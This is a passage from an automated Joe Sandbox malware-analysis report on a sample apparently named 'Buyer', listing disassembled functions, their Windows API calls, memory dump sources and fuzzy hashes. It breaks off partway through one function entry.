                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 357397906-0
                                                                                                    • Opcode ID: 6ebf9254fc71a5789350a51530c460ba3ee4c59632db2a33c866b43cd8a4b863
                                                                                                    • Instruction ID: bf3b504ce35520e01ca7bd5b7f7527f601f8f74514cc972bc7fcae392ee4a3d3
                                                                                                    • Opcode Fuzzy Hash: 6ebf9254fc71a5789350a51530c460ba3ee4c59632db2a33c866b43cd8a4b863
                                                                                                    • Instruction Fuzzy Hash: 501140B9D0120DAFDB41CFA8D884AEEBBB5FB08310F108166E915E3610D735AA55DF90
                                                                                                    Function 00FA3489 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00FA34A7
                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00FA34B8
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00FA34BF
                                                                                                    • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00FA34C6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2710830443-0
                                                                                                    • Opcode ID: 0d22bb60b70b4d60878d27ead8b1832a8e95422f8ac99192f0dd384e43fb35fa
                                                                                                    • Instruction ID: c0d78ca4228e2809a17853a411193cc3d6a1499e95cf5fcd7104be7b66548bb9
                                                                                                    • Opcode Fuzzy Hash: 0d22bb60b70b4d60878d27ead8b1832a8e95422f8ac99192f0dd384e43fb35fa
                                                                                                    • Instruction Fuzzy Hash: 78E0657150222876D7215B729C0DEE77F5DDF46BA1F400056F505D108196A8C940E5B1
                                                                                                    Function 00FD8F4F Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F5986F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F598C9
                                                                                                      • Part of subcall function 00F5986F: SelectObject.GDI32(?,00000000), ref: 00F598D8
                                                                                                      • Part of subcall function 00F5986F: BeginPath.GDI32(?), ref: 00F598EF
                                                                                                      • Part of subcall function 00F5986F: SelectObject.GDI32(?,00000000), ref: 00F59918
                                                                                                    • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00FD8F73
                                                                                                    • LineTo.GDI32(?,?,?), ref: 00FD8F80
                                                                                                    • EndPath.GDI32(?), ref: 00FD8F90
                                                                                                    • StrokePath.GDI32(?), ref: 00FD8F9E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                    • String ID:
                                                                                                    • API String ID: 1539411459-0
                                                                                                    • Opcode ID: 698fee65412c20f2b5456fe35051ad606c87889bcb98482cf367d3c5ae7e2c4a
                                                                                                    • Instruction ID: fe227dc5024fbf220e93889b28ff6908d4d6df25d6731c74966a75640a3d311a
                                                                                                    • Opcode Fuzzy Hash: 698fee65412c20f2b5456fe35051ad606c87889bcb98482cf367d3c5ae7e2c4a
                                                                                                    • Instruction Fuzzy Hash: 02F05E3100665DBADB126F64AC0DFCE3F5BAF06361F188002FA11251E5C7BA9522ABA5
                                                                                                    Function 00F59AE0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetSysColor.USER32(00000008), ref: 00F59AFC
                                                                                                    • SetTextColor.GDI32(?,?), ref: 00F59B06
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00F59B19
                                                                                                    • GetStockObject.GDI32(00000005), ref: 00F59B21
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$ModeObjectStockText
                                                                                                    • String ID:
                                                                                                    • API String ID: 4037423528-0
                                                                                                    • Opcode ID: 394b744d14d17c34f57ce2e4178d894affdc2ad3eda5d46cc1d67002c0e9ebce
                                                                                                    • Instruction ID: 6d3db8b038a694fb5a0a1930ca6baf8ca5904c44664fcc1c14b16b78e7a1aa85
                                                                                                    • Opcode Fuzzy Hash: 394b744d14d17c34f57ce2e4178d894affdc2ad3eda5d46cc1d67002c0e9ebce
                                                                                                    • Instruction Fuzzy Hash: 83E06532645344AAEB215F74BC09BD83B12EB51336F08821AF6F5440E4C3714644AB11
                                                                                                    Function 00F9EACE Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDesktopWindow.USER32 ref: 00F9EACE
                                                                                                    • GetDC.USER32(00000000), ref: 00F9EAD8
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F9EAF8
                                                                                                    • ReleaseDC.USER32(?), ref: 00F9EB19
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2889604237-0
                                                                                                    • Opcode ID: d117fa84931900d30f9762ec6df0da8ba1c6d611af661f280bb61145b3463842
                                                                                                    • Instruction ID: 3b904104b1c0b3c30e8a03853b0776bcd1f6c531647747964baf6998b7880b1a
                                                                                                    • Opcode Fuzzy Hash: d117fa84931900d30f9762ec6df0da8ba1c6d611af661f280bb61145b3463842
                                                                                                    • Instruction Fuzzy Hash: 4DE01A71801208EFCF409FB09808B5DBBB6FB48311F148446E84AA3260CB789A01BF40
                                                                                                    Function 00F9EAE2 Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDesktopWindow.USER32 ref: 00F9EAE2
                                                                                                    • GetDC.USER32(00000000), ref: 00F9EAEC
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F9EAF8
                                                                                                    • ReleaseDC.USER32(?), ref: 00F9EB19
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2889604237-0
                                                                                                    • Opcode ID: 71260d6da77a6e143f58437a324b7bf4f10c759109afde5aee67db7c86ec70ba
                                                                                                    • Instruction ID: 902d095f4a5303ff9386d04e54690c6e814678fe4463db36be2fb77e4bf94e48
                                                                                                    • Opcode Fuzzy Hash: 71260d6da77a6e143f58437a324b7bf4f10c759109afde5aee67db7c86ec70ba
                                                                                                    • Instruction Fuzzy Hash: 2CE01A71801208EFCB409FB09808A5DBBB6EB48311B148046E949A3250CB389A01AF40
                                                                                                    Function 00FB54F6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F43914: _wcslen.LIBCMT ref: 00F43919
                                                                                                    • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00FB5643
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Connection_wcslen
                                                                                                    • String ID: *$LPT
                                                                                                    • API String ID: 1725874428-3443410124
                                                                                                    • Opcode ID: c8ccb877ddaa65c9babbcddefe5496058034a4588f7f712c7c98522501484ed7
                                                                                                    • Instruction ID: 64a3fa3513c349617b33b99fdcf520100afdff78ca17659769df081ad97a0288
                                                                                                    • Opcode Fuzzy Hash: c8ccb877ddaa65c9babbcddefe5496058034a4588f7f712c7c98522501484ed7
                                                                                                    • Instruction Fuzzy Hash: 98915D75A00604DFCB14DF55C884FA9BBB6AF44714F288099E8099F362CB39EE85DF90
                                                                                                    Function 00F6E5CD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 00F6E65D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorHandling__start
                                                                                                    • String ID: pow
                                                                                                    • API String ID: 3213639722-2276729525
                                                                                                    • Opcode ID: 972298803a89dbf046f12a83f4bdac4e3ddb036ab9d87766fe0a39319f8ef0a1
                                                                                                    • Instruction ID: 375d045b42ceae50ac2fb61ee1b4054731f65dbb164842b6e30e4b85c0bf7008
                                                                                                    • Opcode Fuzzy Hash: 972298803a89dbf046f12a83f4bdac4e3ddb036ab9d87766fe0a39319f8ef0a1
                                                                                                    • Instruction Fuzzy Hash: D051BF77E5410186CB117714CD4D37A3BA0AB507A0F70CD6AF099862A9EF768C9BBA43
                                                                                                    Function 00F5A7AA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 172COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: #
                                                                                                    • API String ID: 0-1885708031
                                                                                                    • Opcode ID: 69c2148c0dee81816f136df8f2d5ba6e9269af2e8fc6dc242f39525c632c9b92
                                                                                                    • Instruction ID: 29aea64c8edc295e2c9906fd64c9237706a2c55080bc2925a8351108e180f7df
                                                                                                    • Opcode Fuzzy Hash: 69c2148c0dee81816f136df8f2d5ba6e9269af2e8fc6dc242f39525c632c9b92
                                                                                                    • Instruction Fuzzy Hash: 6E515132901346CFEF14DF28C480ABA7BA0EF16721F244159ED919B290DB38DD57EBA1
                                                                                                    Function 00F5F7BC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • Sleep.KERNEL32(00000000), ref: 00F5F7CD
                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00F5F7E6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                                    • String ID: @
                                                                                                    • API String ID: 2783356886-2766056989
                                                                                                    • Opcode ID: b7f9235c90729561b4fa74d9b651a415db10dd3e868df57a455f702de8162dd9
                                                                                                    • Instruction ID: 1e00160d82dcde1a6a45d6b9c445a1d4fde640c5e088e518adefa1dd5beaf4a9
                                                                                                    • Opcode Fuzzy Hash: b7f9235c90729561b4fa74d9b651a415db10dd3e868df57a455f702de8162dd9
                                                                                                    • Instruction Fuzzy Hash: B0515972518748ABE320AF14EC86BAFBBE8FF84314F81884DF5D841191EF349429DB16
                                                                                                    Function 00FBD863 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 00FBD89F
                                                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00FBD8A9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CrackInternet_wcslen
                                                                                                    • String ID: |
                                                                                                    • API String ID: 596671847-2343686810
                                                                                                    • Opcode ID: 7d9f54624bc7b2a47510e057e2cfd032983781937ba96e9c0b4e398ffd184e80
                                                                                                    • Instruction ID: 8d9186a8c4fbc0c1e6dd90bb580a777edaec0556de86fd87fadf74dcf10a22cf
                                                                                                    • Opcode Fuzzy Hash: 7d9f54624bc7b2a47510e057e2cfd032983781937ba96e9c0b4e398ffd184e80
                                                                                                    • Instruction Fuzzy Hash: D6313871C01209ABDF11AFA1CC85EEEBFB9FF04310F004029F815B6266EB759906EB50
                                                                                                    Function 00FD4CF7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00FD4DDF
                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00FD4DF4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID: '
                                                                                                    • API String ID: 3850602802-1997036262
                                                                                                    • Opcode ID: 40e344d2f8b3d8e823cc9f6c61e826b4026ddd5b2060eff3346dfece5c8bcd3b
                                                                                                    • Instruction ID: f3824d2f98787c1c0bd65a54f2e8f39ba3b8d2f03b821bb09410e7f813959006
                                                                                                    • Opcode Fuzzy Hash: 40e344d2f8b3d8e823cc9f6c61e826b4026ddd5b2060eff3346dfece5c8bcd3b
                                                                                                    • Instruction Fuzzy Hash: F3312A75E01309AFDB14CFA9C980BDABBB6FF49310F14416AE914AB391D770A941DF90
                                                                                                    Function 00FD39AD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00FD3A3A
                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00FD3A45
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID: Combobox
                                                                                                    • API String ID: 3850602802-2096851135
                                                                                                    • Opcode ID: 21cf464afa718ed8d0c93b098ac84b3adcb7b63bca7d2ed59262cb2645e37d93
                                                                                                    • Instruction ID: d1af2923ea73060ed694c082a4b730beac240c2257cb937369041faec086a034
                                                                                                    • Opcode Fuzzy Hash: 21cf464afa718ed8d0c93b098ac84b3adcb7b63bca7d2ed59262cb2645e37d93
                                                                                                    • Instruction Fuzzy Hash: 95110871700108AFEF118E14CC81EFB376BEB453B4F144126FA5897390D6759D51A761
                                                                                                    Function 00FBD48D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00FBD4EC
                                                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00FBD515
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Internet$OpenOption
                                                                                                    • String ID: <local>
                                                                                                    • API String ID: 942729171-4266983199
                                                                                                    • Opcode ID: fbe5b6c03da0e3e942ca0a70c553d87fe460ee745e34ae19f28e8913a9c8e6d7
                                                                                                    • Instruction ID: a929301120eb1f0251855153d96772fe910cbda249393ec7747146fad84637a2
                                                                                                    • Opcode Fuzzy Hash: fbe5b6c03da0e3e942ca0a70c553d87fe460ee745e34ae19f28e8913a9c8e6d7
                                                                                                    • Instruction Fuzzy Hash: 3111EC72615536BAD7388B678C45FF7BE5CEF127B8F004216B54983180E2746840EAF1
                                                                                                    Function 00FD3BE7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 00FD3C69
                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00FD3C78
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                                    • String ID: edit
                                                                                                    • API String ID: 2978978980-2167791130
                                                                                                    • Opcode ID: b9bc4f0c2b2f376e486fdc2ddbc37525d78b9cdb84b32668713b230251a1c90c
                                                                                                    • Instruction ID: 44565990c48d856233e29f77b483ea9fc253a45f84c2277b3bd384885ed3dfcd
                                                                                                    • Opcode Fuzzy Hash: b9bc4f0c2b2f376e486fdc2ddbc37525d78b9cdb84b32668713b230251a1c90c
                                                                                                    • Instruction Fuzzy Hash: C411BF32910208ABEB205F74DC84BEA3BABEB04378F544716FA65A72D0C735DC41B761
                                                                                                    Function 00FA737F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F4A1D4: _wcslen.LIBCMT ref: 00F4A1DE
                                                                                                    • CharUpperBuffW.USER32(?,?,?), ref: 00FA73AF
                                                                                                    • _wcslen.LIBCMT ref: 00FA73BB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                                    • String ID: STOP
                                                                                                    • API String ID: 1256254125-2411985666
                                                                                                    • Opcode ID: eb840b3a25f26d349b6d03107f9e6a58b85e2a23d5a564813073598484312cb5
                                                                                                    • Instruction ID: d9465a62f26eda4b9e921176d6840c8f99f30d78817f337fd3ecd2740f2af1e9
